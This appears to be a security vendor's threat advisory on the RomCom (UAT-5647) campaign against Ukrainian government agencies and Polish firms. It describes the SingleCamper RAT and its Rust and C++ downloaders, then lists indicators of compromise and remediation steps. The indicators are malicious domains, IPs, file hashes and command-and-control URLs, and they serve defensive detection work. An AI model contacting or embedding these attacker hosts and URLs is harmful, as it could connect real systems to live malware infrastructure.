July 1, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
ICS: Mitsubishi Electric CNC Series Vulnerability
October 18, 2024Multiple Microsoft Edge Chromium-based Vulnerabilities
October 18, 2024ICS: Mitsubishi Electric CNC Series Vulnerability
October 18, 2024Multiple Microsoft Edge Chromium-based Vulnerabilities
October 18, 2024
Severity
High
Analysis Summary
Since at least late 2023, a new round of cyberattacks targeting Ukrainian government agencies and unidentified Polish companies have been connected to the Russian threat actor RomCom.
SingleCamper, also known as SnipBot or RomCom 5.0, is a variation of the RomCom RAT that is used in the incursions, according to researchers who are keeping an eye on the activity cluster under the UAT-5647 alias. This version communicates with its loader via a loopback address and loads straight from the registry into memory.
Since its appearance in 2022, RomCom—also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu—has been involved in multi-motivational activities like ransomware, extortion, and targeted credential collection. According to assessments, their attacks have been operating at a faster pace in recent months intending to establish long-term persistence on compromised networks and data exfiltration, indicating a blatant espionage purpose.
To provide a broad range of malware components written in many languages and platforms, including C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE), the threat actor is reportedly rapidly growing their infrastructure and toolkit. The attack chains begin with a spear-phishing message that links to a downloader that opens the DustyHammock and ShadyHammock backdoors, respectively. The downloader is either written in Rust (RustyClaw) or C++ (MeltingClaw). To keep the trick going, the recipient is also shown a fake document.
DustyHammock is designed to communicate with a command-and-control (C2) server, execute arbitrary commands, and retrieve files from the server; on the other hand, ShadyHammock serves as both a SingleCamper launchpad and a command listener. Given that DustyHammock was seen in attacks as recently as September 2024, it is thought that ShadyHammock, despite its added characteristics, is a precursor to DustyHammock.
The most recent iteration of RomCom RAT, called SingleCamper, is in charge of a variety of post-compromise tasks, such as network reconnaissance, lateral movement, user and system discovery, data exfiltration, and the downloading of PuTTY's Plink tool to create remote tunnels with adversary-controlled infrastructure.
Targeting prominent Ukrainian organizations, this particular series of attacks is probably intended to support UAT-5647's two-pronged strategy in a phased manner: first, establish long-term access and exfiltrate data for as long as possible to support espionage motives; second, pivot to the deployment of ransomware to disrupt and possibly profit financially from the compromise. Based on the keyboard language tests the malware conducted, it is also possible that Polish entities were targeted.
Impact
- Unauthorized Access
- Credential Theft
- Data Exfiltration
- Cyber Espionage
- Financial Loss
Indicators of Compromise
Domain Name
- dnsresolver.online
- apisolving.com
- rdcservice.org
- webtimeapi.com
- wirelesszone.top
- devhubs.dev
- pos-st.top
- adcreative.pictures
- creativeadb.com
- copdaemi.top
- adbefnts.dev
- store-images.org
IP
- 213.139.205.23
- 23.94.207.116
- 91.92.242.87
- 192.227.190.127
- 91.92.254.218
- 91.92.248.75
- 94.156.68.216
- 193.42.36.131
- 23.137.253.43
- 193.42.36.132
MD5
- d3d88205fe201c97dd5a75809611ec3c
- 060e1628cf48501dce75c375deeff744
- 32e46499f12fc005570840a2734c7ace
- 92989b176aa220ab5c4b5d44e9d4ded1
- 94d76f2c53c281d90a4eda885c8b6764
- 7d302fbe56cb05278c268af00cd52cc6
- 535f5801d80a62bad6ad74c2c08bbe48
- 171bc76d40e5471c5f79bf4b9c5012a8
- 7667193ac53c5bc150230ea254cf9b95
- fa93bb6c094d5e7995f6b0ec5dfaa1bf
- 86764b49d2a94f88c5aae7aebacc3428
- 299b060e4b23f76476617f183d041e05
- fa400cb70d13cb329d05877b8fe73ed5
- 17e3435ffb029fcc3e542940f1dd7119
- 498c620d80651de26da8f3b850f3045a
- 467c09f465cf061d144624f5b1d6a6ec
SHA-256
- 12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9
- 260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd
- 9062d0f5f788bec4b487faf5f9b4bb450557e178ba114324ef7056a22b3fbe8b
- 43a15c4ee10787997682b79a54ac49a90d26a126f5eeeb8569022850a2b96057
- aa09e9dca4994404a5f654be2a051c46f8799b0e987bcefef2b52412ac402105
- 585ed48d4c0289ce66db669393889482ec29236dc3d04827604cf778c79fda36
- 62f59766e62c7bd519621ba74f4d0ad122cca82179d022596b38bd76c7a430c4
- 9fd5dee828c69e190e46763b818b1a14f147d1469dc577a99b759403a9dadf04
- b1fe8fbbb0b6de0f1dcd4146d674a71c511488a9eb4538689294bd782df040df
- 7602e2c1ae27e1b36ee4aed357e505f14496f63db29fb4fcdd0d8a9db067a5c4
- f3fe04a7e8da68dc05acb7164b402ffc6675a478972cf624de84b3e2e4945b93
- 45adf6f32f9b3c398ee27f02427a55bb3df74687e378edcb7e23caf6a6f7bf2a
- b9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045
- ce8b46370fd72d7684ad6ade16f868ac19f03b85e35317025511d6eeee288c64
- 9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2
- 1fa96e7f3c26743295a6af7917837c98c1d6ac0da30a804fed820daace6f90b0
SHA-1
- 34a0b37f4358b5becd4d8b3b66d453f2be9e941b
- 06c0fb1bdbb75b1fa8b520b70598e2748d08de91
- d652276d998c1fea92e177b2cf803987d26d677c
- 51ac19c0a380f28af7998b341d9be81ea6da7770
- 35b51180a9921a532c00dcb58ee53925d95b53e4
- fc3f4abc4df69d18aaf67ba0be54bd44abd9520f
- d0f5a2032bbc924c662de349a0e9f0c181cba3ae
- 0ff9f3a1d8498b324ab43fabed5c376f680dd4b5
- 754f8e57c1defc44563f51c693ab372bff74ff84
- a1430282d845630cee4c36323091c496aa419619
- 9bc39326727481c9420c801a7eaacdcc3305c0ba
- 27b41a5b2efd92852363114d206c6554440813ad
- 0fa5bfed7dafbe248f436a6b6ca4b08e7e859fd4
- e417da9abdaa07b139ee07709c89dd7f499ad64a
- 6c4f4c1c21b855a5487ae9cdb30cbbe6a4038ba1
- 578f7c0d87c2237fe63ba6b275969913a2172fb6
URL
- http://apisolving.com:443/DKgitTDJfiP
- http://wirelesszone.top:433/OfjdDebdjas
- http://adcreative.pictures:443/kjLY1Ul8IMO
- http://creativeadb.com:443/n9JTcP62OvC
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.